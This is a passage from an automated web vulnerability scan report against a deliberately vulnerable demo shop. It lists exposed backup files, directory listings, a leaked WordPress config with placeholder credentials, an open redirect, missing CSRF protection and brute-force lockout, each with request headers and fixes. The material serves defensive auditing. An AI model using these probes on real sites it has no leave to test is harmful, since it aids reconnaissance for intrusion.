<input name="goButton" type="submit" value="go">
</form>
</div>
<div id="sectionLinks">
<ul>
<li><a href="categories.php">Browse categories</a></li>
<li><a href="artists.php">Browse artists</a></li>
<li><a href="cart.php">Your cart</a></li>
<li><a href="login.php">Signup</a></li>
<li><a href="userinfo.php">Your profile</a></li>
<li><a href="guestbook.php">Our guestbook</a></li>
<?PHP if (isset($_COOKIE["login"]))echo '<li><a href="../logout.php">Logout</a>'; ?></li>
</ul>
</div>
<div class="relatedLinks">
<h3>Links</h3>
<ul>
<li><a href="http://www.acunetix.com">Security art</a></li>
<li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li>
</ul>
</div>
<div id="advert">
<p><img src="images/add.jpg" alt="" width="107" height="66"></p>
</div>
</div>
<!--end navbar -->
<div id="siteInfo">
<a href="http://www.acunetix.com">About Us</a> | <a href="redir.php?r=index.php">Site Map</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wasp@acunetix.com">Contact Us</a> | &copy;2004 Acunetix Ltd
</div>
<br>
</div>
</body>
<!-- InstanceEnd --></html>

Request headers
GET /index.bak HTTP/1.1
Range: bytes=0-99999
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*


/index.zip
Details
This file was found using the pattern ${fileName}.zip. Original filename: index.php
Source code pattern found:

<?PHP
require_once("database_connect.php");
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">
<!-- InstanceBeginEditable name="document_title_rgn" -->
<title>Home of WASP Art</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
<!-- InstanceBeginEditable name="headers_rgn" -->
<!-- here goes headers headers -->
<!-- InstanceEndEditable -->
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) { //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>
</head>
<body>
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead">
<h1 id="siteName">ACUNETIX ART</h1>
<h6 id="siteInfo">TEST and Demonstration site for Acunetix Web Vulnerability Scanner</h6>
<div id="globalNav">
<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a>
</div>
</div>
<!-- end masthead -->
<!-- begin content -->
<!-- InstanceBeginEditable name="content_rgn" -->
<div id="content">
<h2 id="pageName">welcome to our page</h2>
<div class="story">
<h3>Test site for WASP.</h3>
</div>
</div>
<!-- InstanceEndEditable -->
<!--end content -->
<div id="navBar">
<div id="search">
<form action="search.php" method="post">
<label>search art</label>
<input name="searchFor" type="text" size="10">
<input name="goButton" type="submit" value="go">
</form>
</div>
<div id="sectionLinks">
<ul>
<li><a href="categories.php">Browse categories</a></li>
<li><a href="artists.php">Browse artists</a></li>
<li><a href="cart.php">Your cart</a></li>
<li><a href="login.php">Signup</a></li>
<li><a href="userinfo.php">Your profile</a></li>
<li><a href="guestbook.php">Our guestbook</a></li>
<?PHP if (isset($_COOKIE["login"]))echo '<li><a href="../logout.php">Logout</a>'; ?></li>
</ul>
</div>
<div class="relatedLinks">
<h3>Links</h3>
<ul>
<li><a href="http://www.acunetix.com">Security art</a></li>
<li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li>
</ul>
</div>
<div id="advert">
<p><img src="images/add.jpg" alt="" width="107" height="66"></p>
</div>
</div>
<!--end navbar -->
<div id="siteInfo">
<a href="http://www.acunetix.com">About Us</a> | <a href="redir.php?r=index.php">Site Map</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wasp@acunetix.com">Contact Us</a> | &copy;2004 Acunetix Ltd
</div>
<br>
</div>
</body>
<!-- InstanceEnd --></html>

Request headers
GET /index.zip HTTP/1.1
Range: bytes=0-99999
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*


Directory listing

Severity: Medium
Type: Information
Reported by module: Scripting (Directory_Listing.script)

Description
The web server is configured to display the list of files contained in this directory. This is not recommended because the directory may contain files that are not normally exposed through links on the web site.

Impact
A user can view a list of all files from this directory, possibly exposing sensitive information.

Recommendation
You should make sure the directory does not contain sensitive information, or you may want to restrict directory listings from the web server configuration.

References
Directory Listing and Information Disclosure

Affected items

/.idea
Details
Pattern found: <title>Index of /.idea/</title>
Request headers
GET /.idea/ HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/.idea/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/.idea/scopes
Details
Pattern found: <title>Index of /.idea/scopes/</title>
Request headers
GET /.idea/scopes/ HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/.idea/scopes/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/admin
Details
Pattern found: <title>Index of /admin/</title>
Request headers
GET /admin/ HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/admin/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/CVS
Details
Pattern found: <title>Index of /CVS/</title>
Request headers
GET /CVS/ HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/CVS/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/Flash
Details
Pattern found: <title>Index of /Flash/</title>
Request headers
GET /Flash/ HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/Flash/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/images
Details
Pattern found: <title>Index of /images/</title>
Request headers
GET /images/ HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/images/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/Mod_Rewrite_Shop/images
Details
Pattern found: <title>Index of /Mod_Rewrite_Shop/images/</title>
Request headers
GET /Mod_Rewrite_Shop/images/ HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/Mod_Rewrite_Shop/images/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/pictures
Details
Pattern found: <title>Index of /pictures/</title>
Request headers
GET /pictures/ HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/pictures/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/Templates
Details
Pattern found: <title>Index of /Templates/</title>
Request headers
GET /Templates/ HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/Templates/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*


Error message on page

Severity: Medium
Type: Validation
Reported by module: Scripting (Text_Search_File.script)

Description
This page contains an error/warning message that may disclose sensitive information. The message can also contain the location of the file that produced the unhandled exception. This may be a false positive if the error message is found in documentation pages.

Impact
The error messages may disclose sensitive information. This information can be used to launch further attacks.

Recommendation
Review the source code for this script.

References
PHP Runtime Configuration

Affected items

/pictures/path-disclosure-unix.html
Details
Pattern found: <b>Warning</b>: Sablotron error on line 1: XML parser error 3: no element found in <b>/usr/local/etc/httpd/htdocs2/destination-ce/destinationce/system/class/xsltTransform.class.php</b> on line <b>70</b><br />
Request headers
GET /pictures/path-disclosure-unix.html HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/pictures/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*


HTML form without CSRF protection

Severity: Medium
Type: Informational
Reported by module: Crawler

Description
This alert may be a false positive; manual confirmation is required. Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts. Acunetix WVS found an HTML form with no apparent CSRF protection implemented. Consult the details for more information about the affected HTML form.

Impact
An attacker may force the users of a web application to execute actions of the attacker's choosing. A successful CSRF exploit can compromise end user data and operation in the case of a normal user. If the targeted end user is the administrator account, this can compromise the entire web application.

Recommendation
Check if this form requires CSRF protection and implement CSRF countermeasures if necessary.

Affected items

/
Details
Form name: <empty>
Form action: http://testphp.vulnweb.com/search.php?test=query
Form method: POST
Form inputs:
- searchFor [Text]
- goButton [Submit]
Request headers
GET / HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*


/comment.php
Details
Form name: fComment
Form action: http://testphp.vulnweb.com/comment.php
Form method: POST
Form inputs:
- name [Text]
- comment [TextArea]
- Submit [Submit]
- phpaction [Hidden]
Request headers
GET /comment.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/artists.php?artist=1
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/guestbook.php
Details
Form name: faddentry
Form action: http://testphp.vulnweb.com/guestbook.php
Form method: POST
Form inputs:
- name [Hidden]
- text [TextArea]
- submit [Submit]
Request headers
GET /guestbook.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/hpp (914f51fea3c42cbd541a6953a8b115a4)
Details
Form name: <empty>
Form action: http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=12
Form method: GET
Form inputs:
- aaaa/ [Submit]
Request headers
GET /hpp/?pp=12 HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/hpp/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/login.php
Details
Form name: loginform
Form action: http://testphp.vulnweb.com/userinfo.php
Form method: POST
Form inputs:
- uname [Text]
- pass [Password]
Request headers
GET /login.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/signup.php
Details
Form name: form1
Form action: http://testphp.vulnweb.com/secured/newuser.php
Form method: POST
Form inputs:
- uuname [Text]
- upass [Password]
- upass2 [Password]
- urname [Text]
- ucc [Text]
- uemail [Text]
- uphone [Text]
- uaddress [TextArea]
- signup [Submit]
Request headers
GET /signup.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/login.php
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*


Insecure crossdomain.xml file

Severity: Medium
Type: Configuration
Reported by module: Scripting (Crossdomain_XML.script)

Description
The browser security model normally prevents web content from one domain from accessing data from another domain. This is commonly known as the "same origin policy". URL policy files grant cross-domain permissions for reading data. They permit operations that are not permitted by default. The URL policy file is located, by default, in the root directory of the target server, with the name crossdomain.xml (for example, at www.example.com/crossdomain.xml).

When a domain is specified in the crossdomain.xml file, the site declares that it is willing to allow the operators of any servers in that domain to obtain any document on the server where the policy file resides. The crossdomain.xml file deployed on this website opens the server to all domains (use of a single asterisk "*" as a pure wildcard is supported), like so:

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

This practice is suitable for public servers, but should not be used for sites located behind a firewall because it could permit access to protected areas. It should not be used for sites that require authentication in the form of passwords or cookies. Sites that use the common practice of authentication based on cookies to access private or user-specific data should be especially careful when using cross-domain policy files.

Impact
Using an insecure cross-domain policy file could expose your site to various attacks.

Recommendation
Carefully evaluate which sites will be allowed to make cross-domain calls. Consider network topology and any authentication mechanisms that will be affected by the configuration or implementation of the cross-domain policy.

References
Cross-domain policy file usage recommendations for Flash Player
Cross-domain policy files

Affected items

Web Server
Details
The crossdomain.xml file is located at http://testphp.vulnweb.com/crossdomain.xml
Request headers
GET http://testphp.vulnweb.com/crossdomain.xml HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

Web Server
Details
The crossdomain.xml file is located at /crossdomain.xml
Request headers
GET /crossdomain.xml HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*


JetBrains .idea project directory

Severity: Medium
Type: Validation
Reported by module: Scripting (JetBrains_Idea_Project_Directory.script)

Description
The .idea directory contains a set of configuration files (.xml) for your project. These configuration files contain information core to the project itself, such as names and locations of its component modules, compiler settings, etc. If you've defined a data source, the file dataSources.ids contains information for connecting to the database and credentials. The workspace.xml file stores personal settings such as placement and positions of your windows, your VCS and History settings, and other data pertaining to the development environment. It also contains a list of changed files and other sensitive information. These files should not be present on a production system.

Impact
These files may expose sensitive information that may help a malicious user to prepare more advanced attacks.

Recommendation
Remove these files from production systems or restrict access to the .idea directory. To deny access to all the .idea folders you need to add the following lines in the appropriate context (either global config, or vhost/directory, or from .htaccess):

<Directory ~ "\.idea">
Order allow,deny
Deny from all
</Directory>

References
Apache Tips & Tricks: Deny access to some folders

Affected items

/
Details
workspace.xml project file found at: /.idea/workspace.xml
Pattern found: <project version="4">
Request headers
GET /.idea/workspace.xml HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*


PHP errors enabled

Severity: Medium
Type: Configuration
Reported by module: Scripting (PHPInfo.script)

Description
The display_errors directive determines whether error messages should be sent to the browser. These messages frequently contain sensitive information about your web application environment, and should never be presented to untrusted sources. display_errors is on by default.

Impact
Possible information disclosure.

Recommendation
You can disable display_errors from php.ini or .htaccess.

php.ini
display_errors = 'off'
log_errors = 'on'

.htaccess
php_flag display_errors off
php_flag log_errors on

Affected items

/secured/phpinfo.php
Details
This vulnerability was detected using the information from the phpinfo() page /secured/phpinfo.php
display_errors: On
Request headers
GET /secured/phpinfo.php HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*


PHP open_basedir is not set

Severity: Medium
Type: Configuration
Reported by module: Scripting (PHPInfo.script)

Description
The open_basedir configuration directive will limit the files that can be opened by PHP to the specified directory tree. When a script tries to open a file with, for example, fopen() or gzopen(), the location of the file is checked. When the file is outside the specified directory tree, PHP will refuse to open it. open_basedir is a good protection against remote file inclusion vulnerabilities. For a remote attacker it is not possible to break out of the open_basedir restrictions if he is only able to inject the name of a file to be included. Therefore the number of files he will be able to include with such a local file include vulnerability is limited.

Impact
Application dependent - possible remote code inclusion.

Recommendation
You can set open_basedir from php.ini:

php.ini
open_basedir = your_application_directory

Affected items

/secured/phpinfo.php
Details
This vulnerability was detected using the information from the phpinfo() page /secured/phpinfo.php
open_basedir: no value
Request headers
GET /secured/phpinfo.php HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*


PHPinfo page found

Severity: Medium
Type: Validation
Reported by module: Scripting (PHPInfo.script)

Description
A PHPinfo page has been found in this directory. The PHPinfo page outputs a large amount of information about the current state of PHP. This includes information about PHP compilation options and extensions, the PHP version, server information and environment (if compiled as a module), the PHP environment, OS version information, paths, master and local values of configuration options, HTTP headers, and the PHP License.

Impact
This file may expose sensitive information that may help a malicious user to prepare more advanced attacks.

Recommendation
Remove the file from production systems.

References
PHP phpinfo

Affected items

/secured/phpinfo.php
Details
phpinfo() page found at: /secured/phpinfo.php
Request headers
GET /secured/phpinfo.php HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*


Source code disclosure

Severity: Medium
Type: Validation
Reported by module: Scripting (Text_Search_File.script)

Description
It looks like the source code for this script is available. This check uses pattern matching to determine if server-side tags are found in the file. In some cases this alert may generate false positives.

Impact
An attacker can gather sensitive information (database connection strings, application logic) by analyzing the source code. This information can be used to conduct further attacks.

Recommendation
Remove this file from your website or change its permissions to remove access.

References
Source Code Disclosure Can Be Exploited On Your Website

Affected items

/index.bak
Details
Pattern found:
<?PHP require_once("database_connect.php"); ?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">
<!-- InstanceBeginEditable name="document_title_rgn" -->
<title>Home of WASP Art</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
<!-- InstanceBeginEditable name="headers_rgn" -->
<!-- here goes headers headers -->
<!-- InstanceEndEditable -->
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) { //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>
</head>
<body>
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead">
<h1 id="siteName">ACUNETIX ART</h1>
<h6 id="siteInfo">TEST and Demonstration site for Acunetix Web Vulnerability Scanner</h6>
<div id="globalNav">
<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a>
</div>
</div> <!-- end masthead -->
<!-- begin content -->
<!-- InstanceBeginEditable name="content_rgn" -->
<div id="content">
<h2 id="pageName">welcome to our page</h2>
<div class="story">
<h3>Test site for WASP.</h3>
</div>
</div>
<!-- InstanceEndEditable -->
<!--end content -->
<div id="navBar">
<div id="search">
<form action="search.php" method="post">
<label>search art</label>
<input name="searchFor" type="text" size="10">
<input name="goButton" type="submit" value="go">
</form>
</div>
<div id="sectionLinks">
<ul>
<li><a href="categories.php">Browse categories</a></li>
<li><a href="artists.php">Browse artists</a></li>
<li><a href="cart.php">Your cart</a></li>
<li><a href="login.php">Signup</a></li>
<li><a href="userinfo.php">Your profile</a></li>
<li><a href="guestbook.php">Our guestbook</a></li>
<?PHP if (isset($_COOKIE["login"]))echo '<li><a href="../logout.php">Logout</a>'; ?></li>
</ul>
</div>
<div class="relatedLinks">
<h3>Links</h3>
<ul>
<li><a href="http://www.acunetix.com">Security art</a></li>
<li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li>
</ul>
</div>
<div id="advert">
<p><img src="images/add.jpg" alt="" width="107" height="66"></p>
</div>
</div> <!--end navbar -->
<div id="siteInfo">
<a href="http://www.acunetix.com">About Us</a> | <a href="redir.php?r=index.php">Site Map</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wasp@acunetix.com">Contact Us</a> | &copy;2004 Acunetix Ltd
</div>
<br>
</div>
</body>
<!-- InstanceEnd --></html>
Request headers
GET /index.bak HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/index.php
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*


/pictures/wp-config.bak
Details
Pattern found:
<?php
// ** MySQL settings ** //
define('DB_NAME', 'wp265as');    // The name of the database
define('DB_USER', 'root');     // Your MySQL username
define('DB_PASSWORD', '');     // ...and password
define('DB_HOST', 'localhost');    // 99% chance you won't need to change this value
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');

// Change each KEY to a different unique phrase. You won't have to remember the phrases later,
// so make them long and complicated. You can visit http://api.wordpress.org/secret-key/1.1/
// to get keys generated for you, or just make something up. Each key should have a different phrase.
define('AUTH_KEY', 'put your unique phrase here'); // Change this to a unique phrase.
define('SECURE_AUTH_KEY', 'put your unique phrase here'); // Change this to a unique phrase.
define('LOGGED_IN_KEY', 'put your unique phrase here'); // Change this to a unique phrase.

// You can have multiple installations in one database if you give each a unique prefix
$table_prefix = 'wp_';   // Only numbers, letters, and underscores please!

// Change this to localize WordPress. A corresponding MO file for the
// chosen language must be installed to wp-content/languages.
// For example, install de.mo to wp-content/languages and set WPLANG to 'de'
// to enable German language support.
define ('WPLANG', '');

/* That's all, stop editing! Happy blogging. */

if ( !defined('ABSPATH') )
	define('ABSPATH', dirname(__FILE__) . '/');
require_once(ABSPATH . 'wp-settings.php');
?>
Request headers
GET /pictures/wp-config.bak HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/pictures/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*


URL redirection

Severity: Medium
Type: Validation
Reported by module: Scripting (XFS_and_Redir.script)

Description
This script is possibly vulnerable to URL redirection attacks. URL redirection is sometimes used as a part of phishing attacks that confuse visitors about which web site they are visiting.

Impact
A remote attacker can redirect users from your website to a specified URL. This problem may assist an attacker in conducting phishing attacks, trojan distribution or spamming.

Recommendation
Your script should properly sanitize user input.

References
HTTP Response Splitting, Web Cache Poisoning Attacks, and Related Topics
URL Redirection Security Vulnerability

Affected items

/redir.php
Details
URL encoded GET input r was set to http://www.acunetix.tst
Request headers
GET /redir.php?r=http://www.acunetix.tst HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*


User credentials are sent in clear text

Severity: Medium
Type: Informational
Reported by module: Crawler

Description
User credentials are transmitted over an unencrypted channel. This information should always be transferred via an encrypted channel (HTTPS) to avoid being intercepted by malicious users.

Impact
A third party may be able to read the user credentials by intercepting an unencrypted HTTP connection.

Recommendation
Because user credentials are considered sensitive information, they should always be transferred to the server over an encrypted connection (HTTPS).

Affected items

/login.php
Details
Form name: loginform
Form action: http://testphp.vulnweb.com/userinfo.php
Form method: POST
Form inputs:
- uname [Text]
- pass [Password]
Request headers
GET /login.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*


/signup.php
Details
Form name: form1
Form action: http://testphp.vulnweb.com/secured/newuser.php
Form method: POST
Form inputs:
- uuname [Text]
- upass [Password]
- upass2 [Password]
- urname [Text]
- ucc [Text]
- uemail [Text]
- uphone [Text]
- uaddress [TextArea]
- signup [Submit]
Request headers
GET /signup.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/login.php
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*


WS_FTP log file found

Severity: Medium
Type: Validation
Reported by module: Scripting (WS_FTP_log_file.script)

Description
WS_FTP is a popular FTP client. This application creates a log file named WS_FTP.LOG. This file contains sensitive data such as file source/destination and file name, date/time of upload, etc.

Impact
This file may expose sensitive information that may help a malicious user to prepare more advanced attacks.

Recommendation
Remove this file from your website or change its permissions to remove access.

References
ws_ftp.log

Affected items

/pictures//WS_FTP.LOG
Details
Pattern found: 103.05.06 13:17
Request headers
GET /pictures//WS_FTP.LOG HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*


Clickjacking: X-Frame-Options header missing

Severity: Low
Type: Configuration
Reported by module: Scripting (Clickjacking_X_Frame_Options.script)

Description
Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a Web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages. The server didn't return an X-Frame-Options header, which means that this website could be at risk of a clickjacking attack. The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should be allowed to render a page in a <frame> or <iframe>. Sites can use this to avoid clickjacking attacks, by ensuring that their content is not embedded into other sites.

Impact
The impact depends on the affected web application.

Recommendation
Configure your web server to include an X-Frame-Options header. Consult the Web references for more information about the possible values for this header.

References
Clickjacking
Original Clickjacking paper
The X-Frame-Options response header

Affected items

Web Server
Details
No details are available.
Request headers
GET / HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*


Hidden form input named price was found

Severity: Low
Type: Informational
Reported by module: Crawler

Description
A hidden form input named price was found. It's not recommended to hide sensitive information in hidden form fields.

Impact
A user may change the price information before submitting the form.

Recommendation
Check if the script inputs are properly validated.

Affected items

/product.php (21bc3e21f408d9fb4afa8f6848e81f57)
Details
Form name: f_addcart
Form action: http://testphp.vulnweb.com/cart.php
Form method: POST
Form inputs:
- price [Hidden]
- addcart [Hidden]
Request headers
GET /product.php?pic=2 HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/search.php
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*


Login page password-guessing attack

Severity: Low
Type: Validation
Reported by module: Scripting (Html_Authentication_Audit.script)

Description
A common threat web developers face is a password-guessing attack known as a brute force attack. A brute-force attack is an attempt to discover a password by systematically trying every possible combination of letters, numbers, and symbols until you discover the one correct combination that works. This login page doesn't have any protection against password-guessing attacks (brute force attacks). It's recommended to implement some type of account lockout after a defined number of incorrect password attempts. Consult the Web references for more information about fixing this problem.

Impact
An attacker may attempt to discover a weak password by systematically trying every possible combination of letters, numbers, and symbols until they discover the one correct combination that works.

Recommendation
It's recommended to implement some type of account lockout after a defined number of incorrect password attempts.

References
Blocking Brute Force Attacks

Affected items

/userinfo.php
Details
The scanner tested 10 invalid credentials and no account lockout was detected.
Request headers
POST /userinfo.php HTTP/1.1
Content-Length: 28
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
